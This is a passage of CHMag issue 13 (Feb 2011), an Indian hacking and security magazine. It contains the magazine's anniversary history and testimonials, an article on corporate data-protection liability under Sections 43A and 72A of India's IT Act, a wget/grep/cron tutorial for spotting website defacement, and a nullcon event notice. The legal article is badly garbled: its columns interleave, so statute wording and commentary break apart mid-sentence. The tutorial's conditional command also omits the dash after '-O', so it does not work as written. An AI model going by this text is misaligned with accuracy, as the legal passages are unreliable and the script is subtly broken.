magazine over a cup of coffee. After we finished ClubHack 2009 conference, a question was tossed up in our casual meetings that what next after ClubHACK conference? It led to a brainstorming session wherein an idea was conceived that why not to start a magazine on security and hacking to make the people aware about hacking as well as to provide a creditable platform for the security professionals, experts and engineers to share their ideas and knowledge. Till that time, in India, there was no such magazine dedicated solely to the security and hacking. Consensus was reached over the idea and it gave birth to CHMag.
Idea was freezed, but next challenge was how to go ahead with it. But our enthusiasm was so great that we decided our strategy, divided the job in to tasks, everybody worked very hard with amazing dedication and at last our efforts bore a sweet fruit. It was an amazing journey from ‗seemingly impossible‘ to ‗just possible‘. And so after a lot of thinking and planning we came out with the 1st issue on 6th Feb, 2010 at nullcon, an International Hacking and Security Conference. And so CHMag – First Indian ―Hacking‖ Magazine was born.
To make it more interesting and cover a wide range of audience, we came up with 5 dedicated sections – Tech Gyan, Mom‘s Guide, Tool Gyan, Command Line and Legal Gyan. Initially we wrote a few articles by ourselves. Since we are also students, it was hard to manage college and magazine work at the same time. But as the time progressed professionals from the industry started to contribute. Many of them wanted to publish their papers in our magazine and we are glad they chose our magazine as platform to publish their work. Main contribution comes from the security professionals. But contribution has also come from security enthusiasts and students.
Issue 13 – Feb 2011| Page - 24
There are of International contributors as well. In fact they are quite well known in the circle, namely, Raoul Chiesa (Senior Advisor of UNICRI), Dror Shalev and Oren Barad. And it was a great achievement for us to have one of its issue released by the famous security guru Bruce Schneier. Good news! We are coming out with a couple of new sections. One section being ‗Events‘, wherein we will be covering various security events through our CHMag. Second is more of a secret right now. If we disclose it here, tiger will kill us! ;-) Stay tuned with us for more updates on this secret.
Testimonials Here are few testimonials from the experts, contributors and readers. "Thousands may claim to be the first, but everyone knows - who is the first, the best, and provides you with the latest – no doubt – it’s the one and only ClubHack Magazine. I am extremely happy to see the dedicated, committed and quality work by the CHMag Team. I am sure that they will continue to deliver up-to-date and rich content in the coming days to quench our lust for knowledge. Wishing all the very best to CHMag Team – Happy Hacking :) " - Manu Zacharia MVP (Enterprise Security), ISLA-2010 (ISC)², C|EH, C|HFI, CCNA, MCP, AFCEH Certified ISO 27001:2005 LA
“Well, beside having been the "2010 Santa Claus" for ClubHACK Magazine, I do always totally enjoy reading each new issue:-) Aside from those incredibly smart security posters that came out every
month along with the magazine, Rohit Srivastwa and his team in one year made an excellent job, dealing with the Technology, Tools, the lovely "Mom's Guide", the legal aspects and the Command Line tutorials. All of us from the InfoSec community should be thanksful to ClubHACK Magazine!” -Raoul "Nobody" Chiesa Ethical Hacker, Cybercrime Senior Advisor at the United Nations (UNICRI)
"The content covered in CHMag interests a wide range of audience, providing valuable information for the novice and a handy reference to the geeks. This drive has educated and inspired tons of people from across the world. Proud to be a part of team ClubHACK". - Tushar Dalvi, Information Security Institute. Johns Hopkins University.
“When I come to know about CHMag, I was eager to see whether what actually these guys are going to publish. I was really amazed by looking at classification of articles in sections like Tech Gyan, Tool Gyan, Legal Gyan, etc. That's what CHMag did well. it is really easy for me to read articles as per out interests in computer security. Everything is here on CHMag. Also CHMag members provides opportunity to publish article written by readers as well. I have posted one for them and looking forward to post again for CHMag. I congratulate all the ClubHACK guys for such a GREAT initiative in computer security field and wish them to be number 1 in the world...” - Sagar Nangare Web developer, SEO expert.
Issue 13 – Feb 2011 | Page - 25
“ClubHack magazine is the work of a young and passionate team. The magazines are zero BS and 100% useful content. I have been lucky enough to meet the guys behind the show and they are as cool as the mag itself. Great show guys!" - Lava Kumar Penetration Tester, Security Researcher.
“I look forward to read the ClubHack magazine every month. Their topics are structured and well laid out. Their authors have definite deep knowledge of in the topics they write. wishing CHmag a happy birthday and looking forward more editions in years to come”. -Prasanna Kanagasabai Independent Information Security researcher
We are glad to see that many of the security professionals have chosen us as an authentic platform to publish their papers. This over whelming response from the community has kept us going and we will keep doing our best in the pursuit of excellence in cyber security. It is the moment of great rejoices for us and our salute to all our supporters. We thank you for your support.
Varun Hirve Pankit Thakkar varun@chmag.in pankit@chmag.in
Co-founders, CHMag
Issue 13 – Feb 2011| Page - 26
Data Protection and Corporate Liability
The Black side In April 2005, five employees of MsourcE in Pune were arrested for allegedly pulling off a fraud worth nearly Rs 2.5 crore from Citibank accounts of four New York-based account holders. In June 2005, the British tabloid Sun
India – The Emerging IT super power
conducted a sting operation by purchasing
In the recent years India has emerged as one of the preferred destinations for offshore business in outsourcing, financial, educational, legal, banking, healthcare, marketing and telecommunication services. The factors that have turned India into one of the hotspots for offshore outsourcing are the educated and unemployed masses, enterprising nature of Indians who have excellent spoken English skills and relatively cheap labour. Business Process Outsourcing, popularly called BPO is the industry which is multiplying by the day in India.
about 5.50 dollars each from Karan Bahree,
the bank account details of 1,000 Britons for an
employee
of
Gurgaon-based
BPO
Company Infinity E-Search. Similarly, in June 2006, Nadeem Kashmiri, an employee at HSBC's call center in Bangalore, sold the customer‘s credit card information to a group of scamsters who used the information to siphon off nearly Rs 1.8 crore from bank accounts of UK-based customers. In another 3 months, the Channel 4 data theft scandal has hit the
Issue 13 – Feb 2011 | Page - 27
headlines, and coincidentally, it was also UK
implementing and maintaining reasonable
based.
security practices and procedures and
All these incidents sparked off a debate among the offshore industry circles, media and the legal world as to how safe foreign data is in Indian hands. The discussions
thereby causes wrongful loss or wrongful gain to any person, such body corporate shall be liable to pay damages by way of compensation to the person so affected.
were also veered towards the need for some
Explanation. — For the purposes of this
kind of protection for personal data in India
section,—
which is currently absent. Cyber
security
and
and includes a firm, sole proprietorship or
for
any other association of individuals who
organizations and will continue to increase
engaged in commercial or professional
in importance as attacks become stealthier,
activities;
continues
to
has
(i) ―Body corporate‖ refers to any company
be
a
always
been
critical
area
have a greater financial impact on an organization,
and
cause
reputational
damage.
(ii) ―reasonable security practices and procedures‖ means security practices and procedures
designed
The Law
information
from
It is significant to note that by the recent
damage, use, modification, disclosure or
amendments to the Information Technology
impairment, as may be specified in an
Act, 2000, Indian Government has provided
agreement between the parties or as may be
a new legal direction to data protection and
specified in any law for the time being in
privacy.
force and in the absence of such agreement
Two new Sections have been inserted by the amendment that focuses on corporate liability in case of breach of privacy. These are:Sec. 43A Compensation for failure to protect data
to
protect
unauthorized
such access,
or any law, such reasonable security practices and procedures, as may be prescribed by the Central Government in consultation with such professional bodies or associations as it may deem fit; (iii) ―sensitive personal data or information‖ means such personal information as may be
Where a body corporate, possessing, dealing
prescribed by the Central Government in
or handling any sensitive personal data or
consultation with such professional bodies
information in a computer resource which it
or associations as it may deem fit.‘
owns, controls or operates, is negligent in
Issue 13 – Feb 2011| Page - 28
Here, amount of damages to be paid by the
Sec. 72A Punishment for disclosure of
way of compensation is unlimited.
information
in
breach
of
lawful
contract Power
of
adjudication
of
offences
committed under Sec. 43A is with the “Adjudicating Officer” if the amount of compensation claimed is upto Rupees Five Crore; if it is above Rupees Five Crore then it is with the “Civil Court”.
Same as otherwise provided in this Act or any other law for the time being in force, any person including an intermediary who, while providing services under the terms of lawful contract, has secured access to any material
containing
personal
information about another person, with
This Section imposes liability on corporate
the intent to cause or knowing that he is
entities to ensure adoption of Reasonable
likely to cause wrongful loss or wrongful
Security Practices for the protection of
gain discloses, without the consent of the
Sensitive
person concerned, or in breach of a lawful
Personal
Information
of
contract, such material to any other person,
customers. Hence, Banks, Call centers, BPO‘s, etc are under legal scanner to ensure adoption of reasonable security practices to maintain secrecy of data otherwise they will be legally
shall be punished with imprisonment for a term which may extend to three years, or with fine which may extend to five lakh rupees, or with both.‘‘ This Section specifically imposes liability on
liable to pay damages.
intermediary, or any person or a corporate
Illustration:-
body which discloses personal information
Some employees of a famous multinational
of users while providing services under
bank
personal
lawful contract. Hence now Banks, BPO‘s,
information of its customers without their
Call centers, ISP‘s, Mobile Network Service
consent.
providers etc are under legal a scanner to
leaked
out
sensitive
maintain the privacy of customer‘s private In such a case, the bank can be held liable
data.
under this Section for failure to adopt reasonable
security
practices
for
protection
of
Sensitive
Personal
Information.
the
the
Illustration:―Lex Experts‖, an LPO (Legal Process Outsourcing Company) is working on the introduction of an IPO (Initial Public Offer) of a company. While working on it, they had
Issue 13 – Feb 2011 | Page - 29
access to confidential financial information
legislation per se. It does not lay down any
about a company including Balance-sheets
specific
of previous financial years, list of Creditors,
principles. It is a generic legislation, which
Shareholding pattern of a Company, etc
focuses on many issues.
data
protection
or
which is supposed to be kept in privacy. Some employees of that LPO leaked out this confidential information to a rival company in return of huge amount of money. In this case, they can be held liable under Section
72A
information
for in
disclosure
breach
of
of
lawful
contract. Power of adjudication of offence committed under
Section
Magistrate
72A
is
First
with
Judicial
Class
or
Metropolitan Magistrate (In Metro Cities).
Conclusion The recent amendments in the Information Technology Act, 2000 have introduced the concept of Data privacy in India for the first time. Prior to this there were no express provisions for Data Privacy. As per the amendments, corporate bodies now are under obligation to ensure the adoption of reasonable security practices for prevention of misuse of data. However, law is still not clear about defining what “reasonable security practices” are? Additionally, The Information Technology Act, 2000 is not data a or privacy protection
Sagar Rahukar sr@asianlaws.org Sagar Rahukar, a Law graduate, is Head(Maharashtra) at Asian School of Cyber Laws. Sagar specializes in Cyber Law, Intellectual Property Law and Corporate Law. Sagar also teaches law at numerous educational institutes and has also trained officials from various law enforcement agencies.
privacy
Issue 13 – Feb 2011| Page - 30
Monitor Your Website While the whole issue was talking about web security, I thought of writing something on the same lines In this issue of command line gyan, we‘ll see how we can monitor our websites automatically so as to get notified if anyone defaces it. Nothing very great in this and there are a lot of services giving this feature in cheap, but the fun is to write your own dirty little script to help you. So here it goes
Linux We are going to use few tiny commands of Linux to make our monitoring utility a) Wget – it downloads a file from web b) Mail – it sends mail c) Cron – it runs scheduled task repetitively d) Grep – our best text search friend
So now we‘ll see how we can use them together to achieve our objective wget http://chmag.in Will download the homepage of CHMag website. This will produce some verbose noise, so we can use wget –q to run in quite mode grep “Welcome to CHMag” Will search for the text Now if we club them together wget –q http://chmag.in | grep “Welcome to CHMag” This will download the homepage & search for the text. No this will not :) This will download the file & grep will not get anything. So we‘ll have to redirect the output of wget to standard output & then grep it This makes the command to look like
Issue 13 – Feb 2011 | Page - 31
wget –q –O - http://chmag.in | grep “Welcome to CHMag” Now suppose the website is not available due to some web attack which may include DOS, complete homepage defacement, server crash or In such cases you‘ll not be able to download the actual page with your text on it and we can use that logic to create an alert. So now we have added a ―if‖, ―then‖, ―else‖ logic here if [[ `wget -q -O http://chmag.in/ | grep "Welcome to CHMag"` == "" ]]; then echo .Something is wrong. ; fi OK perfect, this helps. But do we need to run it every time we need to check the website? No, let‘s put this in cron job & make a mail alert That‘s easy Simply create a new CRON entry which looks like this
MAILTO=you@someotherdomain.com 10 * * * * if [[ `wget -q -O http://chmag.in/|grep "Welcome to CHMag"` == "" ]]; then echo .Something is Wrong.; fi
This will not work if only a part of your website is defaced leaving around your original text, such as someone managing to write a malicious post on your blog by getting SQL injection or some other web attack somehow, not deleting the core content. In such cases you can look for specific words such as ―hacked‖ & then raise an alert. CHMag for sure can‘t use this keyword & you know why
Windows Sorry, the work is not that easy here. I haven‘t tried a lot on windows cause such things suits on a linux environment only. Having said that let me tell you that it‘s not impossible to use it on windows. Option : Best one would be cygwin :D OR Wget windows binary Grep can be replaced by “find” command (tedious job here) Tools like “bmail” can be used to send mails from command line in windows Schedule tasks can also be created So now it‘s your homework to create a windows alternative to this Linux fun monitoring job & send us an article, we‘ll cover the same in our next issue Happy monitoring
Now your cron task will run 10th minute of every hour and send you a mail if anything is wrong with the website. This is just a brain teaser for you, you can use your own imagination now to twist it to suit your need better.
Rohit Srivastwa rohit@clubhack.com
Issue 13 – Feb 2011| Page - 32
n|uCON 25-26th Feb, Goa
Registration http://nullcon.net/register (online offline)
and
null – The open security community (registered non-profit society) is back with the second edition of nullcon Goa – International Security Conference. We are proud to inform you that we have become the largest and the most talked about security conference by sticking to our core values i.e. providing latest and cutting edge research in information security in a vendor neutral environment. We invite you to join us at Goa and experience the future of information security.
Events
Date
Battle Underground – Capture the flag at nullcon.1st Prize - SANS Hacking class worth USD $4095
25-26thFeb 2011
CXO Track – Talks with focus on Business angle to security for CXOs/managers Tech Track – Deep knowledge research talks focusing on infosec and latest hacker techniques Workshop – Workshops on Latest Research in malware and open source intelligence
Venue The RETREAT by Zuri, Pedda, Uttor Doxi, Varca, Salcete, Goa 403 721
Mehfil-E-Mausiqi – null Networking Party
Issue 13 â&#x20AC;&#x201C; Feb 2011 | Page - 33
STATUTORY WARNING: nullcon can cause severe exposure to high octane Gyan and could leave participants exhausted with wild shack parties. Beware, Be There.
Note: - If you want to cover your Hacking/Security event mail us at info@chmag.in